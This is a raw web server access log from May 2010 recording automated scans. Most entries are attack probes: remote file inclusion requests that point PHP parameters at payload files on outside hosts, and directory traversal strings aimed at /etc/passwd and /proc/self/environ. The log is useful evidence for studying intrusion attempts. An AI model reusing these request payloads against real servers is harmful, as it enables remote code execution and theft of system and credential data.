213.133.99.7 - - [19/May/2010:09:15:56 -0500] "GET /logs/principal.php?conteudo=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 302 "-""Mozilla/5.0"
213.133.99.7 - - [19/May/2010:09:15:56 -0500] "GET /logs/access_log.1270598400/principal.php?conteudo=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 324 "-""Mozilla/5.0"
213.133.99.7 - - [19/May/2010:09:15:56 -0500] "GET /logs/access_log.1263081600/principal.php?conteudo=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 324 "-""Mozilla/5.0"
213.133.99.7 - - [19/May/2010:09:15:56 -0500] "GET /principal.php?conteudo=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 297 "-""Mozilla/5.0"
173.45.162.180 - - [19/May/2010:09:16:12 -0500] "GET /principal.php?conteudo=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 297 "-""Mozilla/5.0"
173.45.162.180 - - [19/May/2010:09:16:12 -0500] "GET /logs/principal.php?conteudo=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 302 "-""Mozilla/5.0"
173.45.162.180 - - [19/May/2010:09:16:12 -0500] "GET /logs/access_log.1266278400/principal.php?conteudo=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 324 "-""Mozilla/5.0"
173.45.162.180 - - [19/May/2010:09:16:12 -0500] "GET /logs/access_log.1263081600/principal.php?conteudo=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 324 "-""Mozilla/5.0"
213.133.99.7 - - [19/May/2010:09:16:39 -0500] "GET /logs/access_log.1266278400/principal.php?conteudo=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 324 "-""Mozilla/5.0"
87.250.255.243 - - [19/May/2010:09:16:42 -0500] "GET /logs/access_log.1239580800 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
213.133.99.7 - - [19/May/2010:09:16:55 -0500] "GET /logs/access_log.1266278400/principal.php?conteudo=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 324 "-""Mozilla/5.0"
213.133.99.7 - - [19/May/2010:09:17:05 -0500] "GET /principal.php?conteudo=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 297 "-""Mozilla/5.0"
213.133.99.7 - - [19/May/2010:09:17:06 -0500] "GET /logs/access_log.1263081600/principal.php?conteudo=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 324 "-""Mozilla/5.0"
213.133.99.7 - - [19/May/2010:09:17:06 -0500] "GET /logs/principal.php?conteudo=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 302 "-""Mozilla/5.0"
213.133.99.7 - - [19/May/2010:09:17:06 -0500] "GET /logs/access_log.1270598400/principal.php?conteudo=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 324 "-""Mozilla/5.0"
213.133.99.7 - - [19/May/2010:09:17:41 -0500] "GET /principal.php?conteudo=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 297 "-""Mozilla/5.0"
213.133.99.7 - - [19/May/2010:09:17:41 -0500] "GET /logs/principal.php?conteudo=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 302 "-""Mozilla/5.0"
213.133.99.7 - - [19/May/2010:09:17:41 -0500] "GET /logs/access_log.1270598400/principal.php?conteudo=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 324 "-""Mozilla/5.0"
213.133.99.7 - - [19/May/2010:09:17:41 -0500] "GET /logs/access_log.1263081600/principal.php?conteudo=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 324 "-""Mozilla/5.0"
213.133.99.7 - - [19/May/2010:09:17:51 -0500] "GET /logs/access_log.1266278400/principal.php?conteudo=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 324 "-""Mozilla/5.0"
213.133.99.7 - - [19/May/2010:09:18:26 -0500] "GET /logs/access_log.1266278400/principal.php?conteudo=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 324 "-""Mozilla/5.0"
213.133.99.7 - - [19/May/2010:09:18:48 -0500] "GET /logs/access_log.1266278400/principal.php?conteudo=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 324 "-""Mozilla/5.0"
58.230.162.220 - - [19/May/2010:09:20:30 -0500] "GET /logs/access_log.1263427200/search.php?cutepath=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
58.230.162.220 - - [19/May/2010:09:20:30 -0500] "GET /search.php?cutepath=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
58.230.162.220 - - [19/May/2010:09:20:30 -0500] "GET /logs/search.php?cutepath=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
58.230.162.220 - - [19/May/2010:09:20:43 -0500] "GET /logs/access_log.1263168000/search.php?cutepath=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
87.250.255.243 - - [19/May/2010:09:28:24 -0500] "GET /logs/access_log.1221955200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.13.45 - - [19/May/2010:09:29:06 -0500] "GET /logs/access_log.1211241600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.13.45 - - [19/May/2010:09:29:07 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.13.99 - - [19/May/2010:09:30:05 -0500] "GET /logs/access_log.1198886400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
208.115.111.248 - - [19/May/2010:09:36:37 -0500] "GET /logs/access_log.1213747200 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [19/May/2010:09:36:39 -0500] "GET /logs/access_log.1213833600 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [19/May/2010:09:36:42 -0500] "GET /logs/access_log.1213920000 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [19/May/2010:09:36:44 -0500] "GET /logs/access_log.1214006400 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [19/May/2010:09:36:48 -0500] "GET /logs/access_log.1214179200 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [19/May/2010:09:36:49 -0500] "GET /logs/access_log.1214265600 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [19/May/2010:09:36:51 -0500] "GET /logs/access_log.1214352000 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [19/May/2010:09:36:54 -0500] "GET /logs/access_log.1214438400 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [19/May/2010:09:36:58 -0500] "GET /logs/access_log.1214524800 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [19/May/2010:09:37:00 -0500] "GET /logs/access_log.1214611200 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
87.106.26.60 - - [19/May/2010:09:38:53 -0500] "GET //index.php?pagina=http://robots.interfree.it/id.jpg? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
87.106.26.60 - - [19/May/2010:09:38:53 -0500] "GET /logs//index.php?pagina=http://robots.interfree.it/id.jpg? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
74.124.219.45 - - [19/May/2010:09:40:41 -0500] "GET /dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.search.php?set_depth=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 366 "-""libwww-perl/5.831"
211.115.111.115 - - [19/May/2010:09:42:37 -0500] "GET /logs//faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://liceum3.ru/help/sh/id.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
211.115.111.115 - - [19/May/2010:09:42:37 -0500] "GET /logs/access_log.1217376000//faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://liceum3.ru/help/sh/id.txt?? HTTP/1.1" 404 343 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
211.115.111.115 - - [19/May/2010:09:42:37 -0500] "GET //faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://liceum3.ru/help/sh/id.txt?? HTTP/1.1" 404 316 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
80.71.1.68 - - [19/May/2010:09:44:38 -0500] "GET //index.php?option=com_appointment&controller=http://robots.interfree.it/id.jpg?? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
80.71.1.68 - - [19/May/2010:09:44:38 -0500] "GET /logs//index.php?option=com_appointment&controller=http://robots.interfree.it/id.jpg?? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
87.250.255.243 - - [19/May/2010:09:44:46 -0500] "GET /logs/access_log.1245456000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
74.54.52.210 - - [19/May/2010:09:46:04 -0500] "GET /logs/access_log.1273363200//?microcms_path../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 312 "-""libwww-perl/5.810"
74.54.52.210 - - [19/May/2010:09:46:04 -0500] "GET //?microcms_path../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.810"
74.54.52.210 - - [19/May/2010:09:46:04 -0500] "GET /logs//?microcms_path../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 200 6151 "-""libwww-perl/5.810"
211.115.111.115 - - [19/May/2010:09:47:55 -0500] "GET /logs/access_log.1217376000//faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://liceum3.ru/help/sh/idi.txt????? HTTP/1.1" 404 343 "-""libwww-perl/5.79"
211.115.111.115 - - [19/May/2010:09:47:55 -0500] "GET //faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://liceum3.ru/help/sh/idi.txt????? HTTP/1.1" 404 316 "-""libwww-perl/5.79"
211.115.111.115 - - [19/May/2010:09:47:55 -0500] "GET /logs//faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://liceum3.ru/help/sh/idi.txt????? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
81.80.122.44 - - [19/May/2010:09:48:43 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 302 "-""libwww-perl/5.805"
81.80.122.44 - - [19/May/2010:09:48:43 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 302 "-""libwww-perl/5.805"
81.80.122.44 - - [19/May/2010:09:49:01 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 302 "-""libwww-perl/5.805"
81.80.122.44 - - [19/May/2010:09:49:03 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 302 "-""libwww-perl/5.805"
212.69.208.145 - - [19/May/2010:09:50:28 -0500] "GET //index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.73"
69.163.180.32 - - [19/May/2010:09:50:56 -0500] "GET //index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.805"
84.40.30.37 - - [19/May/2010:09:52:06 -0500] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 346 "-""Mozilla/5.0"
84.40.30.37 - - [19/May/2010:09:52:06 -0500] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 351 "-""Mozilla/5.0"
84.40.30.37 - - [19/May/2010:09:52:06 -0500] "GET /logs/access_log.1265587200//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 373 "-""Mozilla/5.0"
84.40.30.37 - - [19/May/2010:09:52:11 -0500] "GET /logs/access_log.1270512000//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 373 "-""Mozilla/5.0"
84.40.30.37 - - [19/May/2010:09:52:37 -0500] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 346 "-""Mozilla/5.0"
84.40.30.37 - - [19/May/2010:09:52:37 -0500] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 351 "-""Mozilla/5.0"
84.40.30.37 - - [19/May/2010:09:52:37 -0500] "GET /logs/access_log.1265587200//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 373 "-""Mozilla/5.0"
84.40.30.37 - - [19/May/2010:09:52:43 -0500] "GET /logs/access_log.1270512000//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 373 "-""Mozilla/5.0"
87.252.3.230 - - [19/May/2010:09:53:27 -0500] "GET //errors.php?error=http://robots.interfree.it/id.jpg?? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
87.252.3.230 - - [19/May/2010:09:53:28 -0500] "GET /logs//errors.php?error=http://robots.interfree.it/id.jpg?? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
87.252.3.230 - - [19/May/2010:09:54:01 -0500] "GET //errors.php?error=http://robots.interfree.it/id.jpg?? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
87.252.3.230 - - [19/May/2010:09:54:02 -0500] "GET /logs//errors.php?error=http://robots.interfree.it/id.jpg?? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
207.46.204.177 - - [19/May/2010:09:54:06 -0500] "GET /logs/access_log.1221955200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.199.184 - - [19/May/2010:09:54:16 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
206.123.118.132 - - [19/May/2010:09:56:17 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
206.123.118.132 - - [19/May/2010:09:56:18 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
206.123.118.132 - - [19/May/2010:09:56:28 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
87.252.3.230 - - [19/May/2010:09:56:29 -0500] "GET //errors.php?error=http://robots.interfree.it/id.jpg?? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
87.252.3.230 - - [19/May/2010:09:56:29 -0500] "GET /logs//errors.php?error=http://robots.interfree.it/id.jpg?? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
206.123.118.132 - - [19/May/2010:09:56:35 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
206.123.118.132 - - [19/May/2010:09:56:40 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
206.123.118.132 - - [19/May/2010:09:56:42 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
206.123.118.132 - - [19/May/2010:09:57:12 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
212.69.208.145 - - [19/May/2010:09:57:23 -0500] "GET /logs/access_log.1273276800//index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.73"
212.69.208.145 - - [19/May/2010:09:57:23 -0500] "GET //index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.73"
212.69.208.145 - - [19/May/2010:09:57:23 -0500] "GET /logs//index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.73"
212.69.208.145 - - [19/May/2010:09:58:11 -0500] "GET /logs/access_log.1273363200//index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.73"
207.46.13.144 - - [19/May/2010:09:58:35 -0500] "GET /logs/access_log.1185926400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.252.3.230 - - [19/May/2010:09:58:42 -0500] "GET //errors.php?error=http://robots.interfree.it/id.jpg?? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
87.252.3.230 - - [19/May/2010:09:58:42 -0500] "GET /logs//errors.php?error=http://robots.interfree.it/id.jpg?? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
94.125.182.40 - - [19/May/2010:09:59:46 -0500] "GET //core.php?root=http://grezz.interfree.it/id.jpg?? HTTP/1.1" 404 293 "-""libwww-perl/5.813"
94.125.182.40 - - [19/May/2010:09:59:47 -0500] "GET /logs//core.php?root=http://grezz.interfree.it/id.jpg?? HTTP/1.1" 404 298 "-""libwww-perl/5.813"
206.123.118.132 - - [19/May/2010:10:00:11 -0500] "GET /logs/access_log.1273363200/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
206.123.118.132 - - [19/May/2010:10:00:11 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
206.123.118.132 - - [19/May/2010:10:00:11 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
206.123.118.132 - - [19/May/2010:10:00:23 -0500] "GET /logs/access_log.1273363200/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
206.123.118.132 - - [19/May/2010:10:00:23 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
206.123.118.132 - - [19/May/2010:10:00:23 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
67.159.31.10 - - [19/May/2010:10:00:57 -0500] "GET /logs/access_log.1273276800/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
67.159.31.10 - - [19/May/2010:10:00:57 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
67.159.31.10 - - [19/May/2010:10:00:57 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
74.54.63.138 - - [19/May/2010:10:00:59 -0500] "GET /logs/access_log.1273276800/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
74.54.63.138 - - [19/May/2010:10:00:59 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
74.54.63.138 - - [19/May/2010:10:00:59 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
206.123.118.132 - - [19/May/2010:10:01:03 -0500] "GET /logs/access_log.1273276800/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
206.123.118.132 - - [19/May/2010:10:01:03 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
206.123.118.132 - - [19/May/2010:10:01:03 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
178.32.3.34 - - [19/May/2010:10:01:04 -0500] "GET /logs/access_log.1273276800/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
178.32.3.34 - - [19/May/2010:10:01:04 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
178.32.3.34 - - [19/May/2010:10:01:04 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
206.123.118.132 - - [19/May/2010:10:01:05 -0500] "GET /logs/access_log.1273276800/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
206.123.118.132 - - [19/May/2010:10:01:06 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
206.123.118.132 - - [19/May/2010:10:01:06 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
206.123.118.132 - - [19/May/2010:10:01:07 -0500] "GET /logs/access_log.1273276800/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
206.123.118.132 - - [19/May/2010:10:01:07 -0500] "GET /logs/access_log.1273276800/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
206.123.118.132 - - [19/May/2010:10:01:07 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
206.123.118.132 - - [19/May/2010:10:01:07 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
206.123.118.132 - - [19/May/2010:10:01:07 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
206.123.118.132 - - [19/May/2010:10:01:07 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
206.123.118.132 - - [19/May/2010:10:01:07 -0500] "GET /logs/access_log.1273276800/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
206.123.118.132 - - [19/May/2010:10:01:08 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
206.123.118.132 - - [19/May/2010:10:01:08 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
206.123.118.132 - - [19/May/2010:10:01:08 -0500] "GET /logs/access_log.1273276800/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
206.123.118.132 - - [19/May/2010:10:01:08 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
206.123.118.132 - - [19/May/2010:10:01:08 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
206.123.118.132 - - [19/May/2010:10:01:12 -0500] "GET /logs/access_log.1273276800/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
206.123.118.132 - - [19/May/2010:10:01:12 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
